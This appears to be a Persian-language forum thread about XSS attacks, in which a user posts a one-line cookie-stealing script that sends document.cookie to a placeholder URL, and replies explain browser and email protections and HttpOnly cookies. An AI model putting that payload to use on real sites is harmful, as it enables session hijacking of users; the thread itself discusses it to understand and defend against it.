رتبه موضوع:
  • 0 رای - 0 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
حملات xss
#1
سلام و خسته نباشید
به این کد من ی نگا بندازید.
<script> location.replace('site.com/test/hak/cooki/'+document.cookie); </script>

اگه هکر بیاد و کد بالایی رو در ایمیل به شخصی بفرسته و آن شخص اون رو در مرورگر خودش ب اجرا دربیاره هک خواهد شد و هکر با استفاده از کوکی شخص وارد سایت خواهد شد.
حالا سوالی که برام پیش اومده اینه:
خوب این که ربطی به طراح وبسایت نداره و کاربر باید مراقب این کارا باشه.
آیا شما هم با من هم عقیده هستین؟
واسه این مشکل راه حلی دارید.
ممنون
پاسخ
تشکر شده توسط:
#2
document.cookie کوکیهای سندی که درحال حاضر مشغول نمایشش هستین رو میفرسته نه تمام کوکیها رو
پاسخ
تشکر شده توسط: olampiad
#3
همونطور که مهندس میگه فقط کوکی های آدرس جاری ارسال میشن.
بعدم سیستمهای ایمیل (چه تحت وب چه نرم افزارهای ایمیل کلاینت دسکتاپ) معمولا جلوی اجرای کدهای جاوااسکریپت رو میگیرن اصلا فیلتر و حذف میکنن. البته اینا بعضی وقتا قابل تنظیم هست در نرم افزار که بشه فعال کرد (ولی فکر نمیکنم برای سرویسهای وب بخصوص یاهو و اینا چنین گزینه ای اصلا وجود داشته باشه)، ولی بهرصورت بصورت پیشفرض غیرفعاله و طبیعتا به ندرت پیش میاد که جایی فعال دیده بشن.
سوما اینکه امروزه روز دیگه اکثر کوکیهای دارای اهمیت امنیتی رو HTTP Only میکنن که جاوااسکریپت بهشون دسترسی نداشته باشه. مگر از راه باگی چیزی در مرورگر بشه به این کوکی ها در سمت کلاینت دسترسی پیدا کرد.
پاسخ
تشکر شده توسط: olampiad
#4
(16-06-1394، 11:55 ق.ظ)Eshpilen نوشته: سوما اینکه امروزه روز دیگه اکثر کوکیهای دارای اهمیت امنیتی رو HTTP Only میکنن که جاوااسکریپت بهشون دسترسی نداشته باشه. مگر از راه باگی چیزی در مرورگر بشه به این کوکی ها در سمت کلاینت دسترسی پیدا کرد.

چطوری میتونم کوکی رو امنیتی یا HTTP Only کنم.
ممنون
پاسخ
تشکر شده توسط:
#5
یه سرچ کنید رفرنس و منوال و منابع زیاد هست.
توی تابع ست کردن کوکی آپشن مخصوصش هست.
پاسخ
تشکر شده توسط:




کاربران در حال بازدید این موضوع: 1 مهمان